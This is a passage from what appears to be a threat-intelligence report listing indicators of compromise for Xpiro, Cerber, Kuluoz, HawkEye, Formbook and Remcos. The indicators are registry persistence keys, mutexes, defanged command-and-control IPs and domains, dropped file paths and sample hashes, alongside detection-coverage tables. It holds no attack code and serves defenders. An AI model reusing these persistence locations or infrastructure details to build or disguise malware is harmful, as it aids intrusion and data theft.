%LOCALAPPDATA%\bolpidti\pxB676.tmp 1
%LOCALAPPDATA%\bolpidti\pxB53E.tmp 1
*See JSON for more IOCs

File Hashes

16b156359492fd1c04ca8024be9520ed9b2f2c1c3a9d2d72177b74e53c5f7237 1837b9072548d7fd6ccff6dff1c9f6261df6ab977c06aef95b328bcbcde8f24d 1a74c2f06d531a5947ea3fa980fb9e08dd4ef2938cd53215b1fb04403160632d 1b85483edb2968b8303b3a3edeb69776cc237bfb2e844862315aad399a1fbb60 3cf846acf89647d5eec22871e3b8d36fb2e6a1e24b609cc140fb4d32b3627a89 3ea014d13ab9de10c12705d951d36001fade2375373992d09f04a13991abdda6 650b142204d54fb6be3adc953325be09df8e8472f6e75bf89bd96fac0604df07 705e36bc25534e3496cf040179df7965df62f4f8d20d2296af65ed2c7765ad08 7d34aa04431ca6d29ae750551d62303521f50e7302e508b8c3a68c2501cedbc7 7dcf9ef1156ebc96cd7f33fa65da1aa3ee6c4e40d98f396ef4f997384324debd 9ad3fe646a2e70461cbd0c6b5baf6e6aa86780bfec67324dc37cc71abc16dc6d 9f42d128eadd1933ef6f05b58612799009a028830d9e62a384565616fca5d6a3 c963abb11b88bd5d2b451b6a73e2e853ce7777ff07a5a481d1c6d195f5d6bf34 d9799be6fc5a08a58f2da15d8ce3550fb462ccb97b6e932d1531ffdbc4af28c7 d9cbec3c2d30347d5781f4f656e0775eda33ae905092bc1673a8d68aeb9f643a ecc77e015461dc1d4f9760ae11faa17ed9a46916a15c958cd2fd888b9d18441a f1e64265f0a305cba4442afeb8014c726b93c5065b92cbe997ebe02ff38f4092 fd2ee83c36b70791828d0143ad3737d917edaaf909f72499f6709615391e3700

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Virus.Xpiro-9964080-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WISP\PEN\SYSEVENTPARAMETERS (Value Name: RightMaskEnable) 25
<HKCU>\SOFTWARE\MICROSOFT\WISP\PEN\SYSEVENTPARAMETERS (Value Name: ShakeEnable) 25
<HKCU>\SOFTWARE\MICROSOFT\WISP\PEN\PERSIST\0\1 (Value Name: HidCursorName) 25
<HKCU>\SOFTWARE\MICROSOFT\WISP\PEN\PERSIST\0 (Value Name: type) 25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\TABLET PC (Value Name: Ident) 25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\TABLET PC\CACHE (Value Name: HPITP) 25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\TABLET PC\CACHE (Value Name: HPETP) 25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\TABLET PC (Value Name: IsTabletPC) 25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\TABLET PC (Value Name: IsTabletPC) 25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\TABLET PC (Value Name: DeviceKind) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE (Value Name: Start) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0 (Value Name: Type) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0 (Value Name: Action) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0 (Value Name: Guid) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0 (Value Name: Data0) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0 (Value Name: DataType0) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0 (Value Name: Data1) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0 (Value Name: DataType1) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0 (Value Name: Data2) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0 (Value Name: DataType2) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0 (Value Name: Data3) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0 (Value Name: DataType3) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND (Value Name: Start) 25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER (Value Name: HideSCAHealth) 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV (Value Name: Start) 25
Mutexes Occurrences
kkq-vx_mtx63 25
kkq-vx_mtx64 25
kkq-vx_mtx65 25
kkq-vx_mtx66 25
kkq-vx_mtx67 25
kkq-vx_mtx68 25
kkq-vx_mtx69 25
kkq-vx_mtx70 25
kkq-vx_mtx71 25
kkq-vx_mtx72 25
kkq-vx_mtx73 25
kkq-vx_mtx74 25
kkq-vx_mtx75 25
kkq-vx_mtx76 25
kkq-vx_mtx77 25
kkq-vx_mtx78 25
kkq-vx_mtx79 25
kkq-vx_mtx80 25
kkq-vx_mtx81 25
kkq-vx_mtx82 25
kkq-vx_mtx83 25
kkq-vx_mtx84 25
kkq-vx_mtx85 25
kkq-vx_mtx86 25
kkq-vx_mtx87 25
*See JSON for more IOCs
Files and or directories created Occurrences
%CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 25
%CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE 25
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 25
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 25
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 25
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 25
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 25
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 25
%System32%\alg.exe 25
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log 25
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log 25
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngen_service.log 25
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log 25
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat 25
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat 25
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat 25
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.lock 25
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat 25
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.lock 25
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngenservicelock.dat 25
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngenofflinequeuelock.dat 25
%SystemRoot%\Microsoft.NET\ngenservice_pri1_lock.dat 25
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngenofflinequeuelock.dat 25
%LOCALAPPDATA%\Microsoft\Journal 25
%LOCALAPPDATA%\Microsoft\Journal\Cache 25
*See JSON for more IOCs

File Hashes

0070146a1ddd5e7afa882029c836662a3fb7b83f2c838d1d89caf36ceaa73a47 00b9049e01ce60ee17e973f88fc730db18f2354b24a991cac09045cf697ffcf2 016023a53be6ce6624efe73b85c47c87d1e11ba8593009e261361addc6b5229e 048729edafbebec1b073db5db75450793fdd7e424dff0f851ad7500637b18bb3 087ef762c54b247a6fe8c1780073c934a4109a19dea80daefeec3bc98ca184ba 0b903e0f08dd1d929b6465e79971af4270fd7adb95e3271f442e4f6c2b6c01cf 0e40ef742a696da27514cf05055133991293a0e7d451ccc6d96ec93c0e864518 0e5e93e845310617138227cb8a453da259c23edcc9a8059fac49da8e947887a5 158627899237148353fefd8771d26c622b873d6177960e2efe00355179fb4926 1a4a30778ce717e13e02870993244eea6614a74a47bd0c5b01a8d839c670ef3c 1b56d9fe2ff011d5fad562c8e8da9dcb15a8f417619e5f506772acb6d53b3814 1b6494daf80b3f3afa22ffb43976d529383b9c3e0e2a337fa03234c784ce68a6 1e955e41ac1707547188639c3e0d8dcf46c0a05880041076eafb967a5cb2e6ca 1f48b7aaccb5c9c37c9a5322aecde23cec77a378e20db829c3ea8888c153bdc2 1f89fcbb17f91bee3821e3ae7ad9b8c2f2427ecb7e11b2af366713111c5f4a9f 21a7485afe868ce040664494eb3adbefd2f88eaed2fbf168feac2ec1eb2fa213 28e949123a4493bc7276085d3387c5f8aa761087087b9488782543b41c47cf7f 2bb191ac9f42eeb32f06ed94083221c5abb6b894f0bffe17355e125773a85f7f 2d5faf0c2fce5f825fa278dea2aef683d928326d30e976aa8d85bd3d1a3bf947 30408f887ac16f3a1b11b1ba075c5c6aa6a8fd34dc3059ecb611dcd80245b70a 341507c416c481481ced2ca2b4739e58a23882bcf8d3a48b193e4983743db45f 347b1f4517869f1574065c2867ed410a6a8c5bac063b8551133769890f16305e 3bbbe0a4c6cf2f6a1a57c7b31adc6abff0bd39e9b4ead44ec93558f03e5aa9dc 3bcdda17309cd36926504ad0300da1226ba126413c25aaabed729d889e293deb 3c35ed8b6f46dec8e7386f380ea3f0530fb592e50f0a66486a5c1d1390441f2c
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.Cerber-9964300-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Mutexes Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 25
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
31[.]184[.]234[.]0/23 25
Files and or directories created Occurrences
%APPDATA%\Microsoft\Access\AccessCache.accdb 1
%APPDATA%\Microsoft\Access\# HELP DECRYPT #.html 1
%APPDATA%\Microsoft\Access\# HELP DECRYPT #.txt 1
%APPDATA%\Microsoft\Access\# HELP DECRYPT #.url 1
%HOMEPATH%\Documents\Outlook Files\# HELP DECRYPT #.html 1
%HOMEPATH%\Documents\Outlook Files\# HELP DECRYPT #.txt 1
%HOMEPATH%\Documents\Outlook Files\# HELP DECRYPT #.url 1
%HOMEPATH%\Documents\OneNote Notebooks\Notes\# HELP DECRYPT #.html 1
%HOMEPATH%\Documents\OneNote Notebooks\Notes\# HELP DECRYPT #.txt 1
%HOMEPATH%\Documents\OneNote Notebooks\Notes\# HELP DECRYPT #.url 1
%HOMEPATH%\Documents\# HELP DECRYPT #.html 1
%HOMEPATH%\Documents\# HELP DECRYPT #.txt 1
%HOMEPATH%\Documents\# HELP DECRYPT #.url 1
%HOMEPATH%\Documents\OneNote Notebooks\Personal\# HELP DECRYPT #.html 1

File Hashes

1d742c8577645242811867311339af6291f2ec45f74bc8065a1cf167a140a5fd 241a8a73608aae3d0b55451290c7e3d46ff6b53d7cfad628ddc43892fb4ee89f 32cafa5a0a63f137fda8532c81a4825895a71b4bd5192ef77ee46b4f5f6f55c9 3f066735d5b3e9e1d145865b805dad9f17c7569e86a2fd0dadfd82fa3f2494b5 46df3cbdc0c960cc03467797f2a8f4000de6f3860ddd87a93f0db4bc04bf3dc9 5145e134c5c488fac15c3772747505246139842d64e995a20aa343e87d05805a 529c0ad1eba89641544fe5eb534b717fdb0a21e36db94874cdc7720b3e58170d 65fb6bf40643b54875192d5964ead478b867784c09708c9be583a06d820462e8 6a380578e8f27a835c45af896c8292c173ccf10819eadb160d8fd1ec9301ae61 6bd30bfa9ee3dcf045298887cb839ccf7ebd19950a4a1798bb15c9c2bcd89df6 715e19ce015fb13ad5b0bd5aa520b7a9fdb52c15a58b78da79db3c74cdccee83 74a423f877c5f0819116f6f93870658bac4ac7de6048e68d5f1cb98df9c77992 7781696924168577eb1045874ac6a259617184cd2bdf429fd032efd63254016d 7eecc13411c597f5e2fa68c77ae65943ae99c0eb6bb76e527a9711ffff73d505 832487a8c89c32e86036b1c94353117ab0ca7a4276a9f4c08b29c96c447247fa 89ec20a6130f663160015755f0c1b4f1698812e3f0e39d3e7094950c3644bca4 8ab03a0c900cc88a57e9474d3ced6b4f43be422750f5afc8a08ff6cdb801930b 936d99a0dc23922d4e5874f1548114fe8f2170016f29d9b91858796a1b2ab095 96671b8ca3f8cf75427a23de8ddde2513efd4f1eba5afa2b18610c66548d0b55 988a44db0411379ea08fece4af0577d3af7ed5114dcbd897a03ec46474fafa81 a162009fa564f3c20b801568ab82dd34b53655473c6e379272e3dfd766fe2c02 a3004d7f08a9357c5d0a9e063dafd5f4c627fce7b030a575b6959f0f5f7c9ff1 b2f4ef1398ae23fabaa137be5f8f7f5412b1b8f74f902d23de5e0a87ef5a3867 bcc77c2e25a5ceee5fd7023dd879baa53a16ce0f4b3187a90a5eb22cf46631af df5d03a2ca58bb71c44a8b23191c7d3e24327e806509dfcccad1cd63729dc445
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Worm.Kuluoz-9964104-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 26
<HKCU>\SOFTWARE\TKQJXHIR (Value Name: nnagtvkf) 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: iemwudbv) 2
<HKCU>\SOFTWARE\PKBQSDOK (Value Name: wfiqbttr) 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: deiobboq) 2
<HKCU>\SOFTWARE\TEFAPJXX (Value Name: hjlkqasv) 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: nmvftwdp) 2
<HKCU>\SOFTWARE\ROHCSWFU (Value Name: ivxesusr) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: rskaarvw) 1
<HKCU>\SOFTWARE\ONFHUPBQ (Value Name: qrlpghvv) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: dwxwetxw) 1
<HKCU>\SOFTWARE\JUNLDJNI (Value Name: paxvvuef) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: buwqaweo) 1
<HKCU>\SOFTWARE\QPANUOIR (Value Name: mmvjkbpj) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: lawgdaar) 1
<HKCU>\SOFTWARE\IDIFICQU (Value Name: uqiuudaf) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: uaugufwr) 1
<HKCU>\SOFTWARE\EPCSQSNO (Value Name: sdkgxoqv) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: nojriosh) 1
<HKCU>\SOFTWARE\IIBPNATQ (Value Name: qbmgekoa) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: tabswxsd) 1
<HKCU>\SOFTWARE\CHUFRWHS (Value Name: nhmwllub) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: kawalexr) 1
<HKCU>\SOFTWARE\QDCTDCFM (Value Name: ietjtgir) 1
<HKCU>\SOFTWARE\JUOBFMWV (Value Name: ucngtfoi) 1
Mutexes Occurrences
2GVWNQJz1 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
91[.]196[.]126[.]16 21
88[.]198[.]25[.]17 20
173[.]203[.]113[.]44 19
178[.]33[.]162[.]8 18
176[.]31[.]106[.]226 18
74[.]50[.]60[.]116 18
198[.]24[.]142[.]66 17
Files and or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 26

File Hashes

0828aee088e7c191c463dac5a2449474da1b106da5e12b6335f61d2dd3ae320e 0ddf461f926f814d19696d3851f3673c10d69a15fa2d7cfac9552c3af9460c66 12b274776143da76ceea8cfc1b8219535bca09dea1ea6059a48e74dd6a78e80d 160999be2e3f124a106ced958bce6b6f94fbc3645895aa0129e4dedb443011d7 21245351ac8d14c31552d46c0f8ceec6d576a1abae0ab3d5131e25e9e8fefe32 23fec3f833e9a7ee790ea9cad1b205ade2036466282654b2e53f23516553b775 24e1fb11b1c63caf42bc0a9d8df57cb1c84ccb11415f01c56de128d6ceb2ea4e 2bf5a6f99c57bcaddd28a0a8dad595686b9a660843cd4037575d4abb82af8f69 32a01832f4de0f17e438fed6be9f155d9fd30056133681c7474f0114a1731a9b 35a4fe74474b4f7e7f9c777d063097e36a16f509bc3afb9579779c0504b73af4 3a3fae86a4e14a7d50b6c5bc5d78dc12745fa53d240df641e1fc311449368c85 3da619fa973717201422faf7329016a266b27b89f8a39416cac203f75f32259a 405d7737a27f0798b16f85939c3eacfcbe9e5305b4c621dd20bcaffbe994d88f 413f4fcae50cdad66f08e0e3ae083e60e18e54f890492fcd0241deb9dfe81b81 44d0507ee9143aa548ae8a03171b27633f4226abbad172a0456194a2ef2eb507 44d1449c19d3f79a3fe21e2ab9d333a1bea4156565a3106fc2203ccefa869a9b 4979dce8592c0d16bdc6228b9741ef6c315e3bb1ff34de14271fb3499cd0f139 4b7891ed58a08b45b576282afd74fe835845cd4be8c5aab467ad09136e87ec8e 4bc8eb3d2e72a44384b3d824b33a971ace9eae20998dfe8bdd2ab9b9267b5b43 4c6528d000e07485c69f1c32a95967a454fd20864a4ad2c062160d99987822ef 50c108f9fc31557d55216dfe28b9eeac15fe5f1175a089ff196e1129d6ddf593 5730f9ce8c84e6f1c153c247146ac1590fd989a73cdc9dce9d67594b33caf354 5a45837812962153f5d480918eab77093394dd41c45c610ffd142461ab433668 5e37715cc8a5d1b6c5bed437eea25da495285bb1386cf2aef2b5484fd6c30e69 5ee4adead518246dc926545a0d28e1a488f04d530c49591cc788a8e2b360ad89
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.HawkEye-9964231-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: Audiodgi) 11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM (Value Name: DisableRegistryTools) 1
<HKCU>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM (Value Name: DisableCMD) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 1
<HKCU>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: wsntcffy) 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: nvidia) 1
Mutexes Occurrences
<random, matching [a-zA-Z0-9]{5,9}> 25
Global\2ef47fa0-2008-11ed-9660-001517841a07 1
Global\30820541-2008-11ed-9660-001517841a07 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
178[.]62[.]9[.]171 8
185[.]53[.]177[.]51 8
172[.]253[.]62[.]108/31 5
178[.]217[.]187[.]144/31 3
217[.]69[.]139[.]160 2
123[.]126[.]97[.]113 2
103[.]224[.]182[.]246 1
178[.]217[.]186[.]170 1
178[.]217[.]187[.]103 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
myip[.]ru 8
resolveme[.]org 8
www[.]myip[.]ru 8
smtp[.]gmail[.]com 5
smtp[.]mail[.]ru 2
smtp[.]163[.]com 2
bobbyjoeconfirmed[.]biz 2
pradaengaged[.]serveftp[.]com 1
xtradaniels[.]no-ip[.]biz 1
funtalk[.]info 1
moneymakingmachines[.]in 1
Files and or directories created Occurrences
%APPDATA%\_backups 25
%TEMP%\logff.txt 16
%TEMP%\logmail.txt 16
%APPDATA%\AudioSettings 12
%APPDATA%\AudioSettings\Audiodgi.exe 9
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Audiodgi.exe 8
%APPDATA%\Audiodgi.exe 2
%TEMP%\mRef.vbs 1
%APPDATA%\21bc764836db3d1ea78f465895072d4b.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\wsntcffy.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\nvidia.exe 1

File Hashes

03766a0f7239053205ddf362d05c9714374468c47b7978c5f180d4346ad8dd75 04d8e6413d217a3b8667284be0d3f1fc586a12ccb29f03f798b48e92c2ba2a6a 051c2a84fd29361d952dc213ebaa39da5dadfa41927b9424e8960e79556ff91d 08c9702801db0785656c59c1d180a3a026ece467bf674aeaf9329611ae442306 13c0b67b1985e5e8292200b4c340090d5cc9ef1885a1f891b00f6f08a33c45da 1506c249e7b6fc69f4c1ec396ccc692de2c8546685f6aed55e5bcf33849255ab 1bea6b0a9773065b3ef5ed3ce7c3ad5a2b495406a539b4dccb3c1e32073961e4 1cbf4d46e6d149b1f97de0013aea8bda5b2f4535a1b5fca4ca8739e88f95a4ba 22f80ae2cad2fd2aa7a7cb0565721804cd24c72e2eeaeb2783ef70f81b99e843 2a2b148519552d60b9c62b888f0d9ee578113f5ce58256d8471913dfb5a32578 2eed91ed6b2132227ac6b4889bbe8d355af50741cf8cef18cbed1e4395c8c42d 370ce2f768b84e42a2c56e597fe7a2d86799a7715e683e59fc4beb826a69ba6c 3d6425c514e23ca7982ab26f5b2f1ca29abada5b15e19826611be2610be094bc 4294385e9d05112594442aa9b7dcbc37a39a1324301c5e80e8d2549ba984b537 46324728750feb25ce7ce3f933aed27cb0daf27731205b0e05dbbba4923faf36 47122b45356ff2c4f0edfa9048cb93f11c277b05287ae178436083a255719d1f 4be4967316c1b328c834cc67659c4d441a94d5625be466a0010138f90d7a0279 4e382da874ae16b2ba6b98b3398db36bd3c6623d0708f4d10571dc15baac1c65 52d93afc8cb34ee03f9fbf9c38a519573f78bf3e05ab428ae33efc84aa48b419 5887043c8072209c8a0060620a6161446aae16c9b47f71ad6f26e77bdc448ecc 5f3dd03b1c9156a7adf1926b4aacc9e799aa18b3e28eefe9be5e2f19229a0544 606bc0f3eb81ef1f352adfad845122dac3d67294bc5218aead9c9d43ab771133 654ad2f7e51da105511c1963e47206a7cbd45d50d9637f1411c0a31a4639e342 67c0c1048e1a354c6bc71745f552d7c2e51311ae6983cddce72526c4e0da3022 6942e3afa79edc13dcfd9a3d7142b960bf4b13618b1918dab731ba7dadb0eaa4
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.Formbook-9964246-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E (Value Name: LanguageList) 11
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\INTELLIFORMS\STORAGE2 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: Ejetkygbp) 1
Mutexes Occurrences
8-3503835SZBFHHZ 1
862Q-UTS0E2J0FF1 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]42[.]12/31 4
172[.]64[.]149[.]82 4
104[.]18[.]38[.]174 3
162[.]159[.]136[.]232 1
20[.]190[.]154[.]18 1
52[.]95[.]165[.]126 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
onedrive[.]live[.]com 11
cacerts[.]digicert[.]com 7
login[.]live[.]com 1
discord[.]com 1
www[.]samtaxitours[.]com 1
dioefa[.]ph[.]files[.]1drv[.]com 1
patronkingoopsalmghandnaiojamexicoquadaras[.]s3[.]sa-east-1[.]amazonaws[.]com 1
vuladq[.]am[.]files[.]1drv[.]com 1
dimk5w[.]ph[.]files[.]1drv[.]com 1
njie9a[.]am[.]files[.]1drv[.]com 1
ibjoxq[.]dm[.]files[.]1drv[.]com 1
zlpuma[.]bn[.]files[.]1drv[.]com 1
rqy3zg[.]db[.]files[.]1drv[.]com 1
Files and or directories created Occurrences
%APPDATA%\862Q-UTS 1
%APPDATA%\862Q-UTS\862log.ini 1
%APPDATA%\862Q-UTS\862logrc.ini 1
%APPDATA%\862Q-UTS\862logri.ini 1
%PUBLIC%\Libraries\Ejetkygbp.exe 1
%PUBLIC%\Libraries\pbgyktejE.url 1

File Hashes

0f972ec1fd4fb660cc86ed459c5a793a134451d479154b00a2d4a1a360d44e42 13e91b5a246dc5f98cc413508e78136fd38c9f2e9151c65a96f509b2d82ddf46 13f7ce642c44202a089400e9b33db0ed02f824b5291ed4b5da3d080ecc40589f 14ce5ef3e6e3d3354150ae58fd4e9938bcb747c5e4190bd5f793043355e009e4 5a377c52fb8f4bbce7272f13d3f6ac8c36ce7a6f51561ed0a79cca6b8facf23e 5fb5546859ff3e2a9d75d37a208f43449f254442f67a2da49b60cfd169abdc44 6555c0d7b9acbff665b84aec9164dd1cf01740a10e735791f25c28a5da830740 6c232920b9bb1f2c3bf71124f93f06f49fdf41c3bae35237f7b031bebba14cc5 b4175a0744b29d7aecf1245dfb253e6417f839d2eeb2ef90b8ed222e1387aa1e c2062d2d3ac3815d7a050a1bfb261c98581e7398f8b0c7ca670d7ddb328611d2 c6628dd39b388886cc7867d66b7a133f61b666421ad489bb0bddaf5c856ce841 cac68bb4b0df3a7078d4c66d810a0d8f8863afd22722cd3dd0788af291dd1853 cdcf2ed4c36ebd0856e7663921d67c31e51ad8a6cbb5c5cdd401d30812e25a62 d332fa69a36ac7e14d35c336a609a04f74e8da6c51b6ad6286f23ad5f2837cd8 dc31d2ad84fda1d9af2e623493e1e4f5dcfc8aa3abd55c6d58d1eae807cb56d8 e62a70218462e892bcf89e851549e6a4f75131d52d57734bc642332141169aa9 eda74534f0c37003022c0003d4b4c3262016d486d919298a323164eae4f0925a ee2ced66adeccfe45722c49efd8b99fd032d0426ff74cd10fc1e182521431404

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.Remcos-9964868-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 14 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\REMCOS_VOXCYIGINC 14
<HKCU>\SOFTWARE\REMCOS_VOXCYIGINC (Value Name: EXEpath) 14
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E (Value Name: LanguageList) 12
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E (Value Name: @explorer.exe,-7001) 12
Mutexes Occurrences
Remcos_Mutex_Inj 14
remcos_voxcyiginc 14
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
urchamadi[.]ddns[.]net 14
Files and or directories created Occurrences
%APPDATA%\remcos 14
%APPDATA%\remcos\logs.dat 14
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\windows.vbe 14
%APPDATA%\windows.exe 14

File Hashes

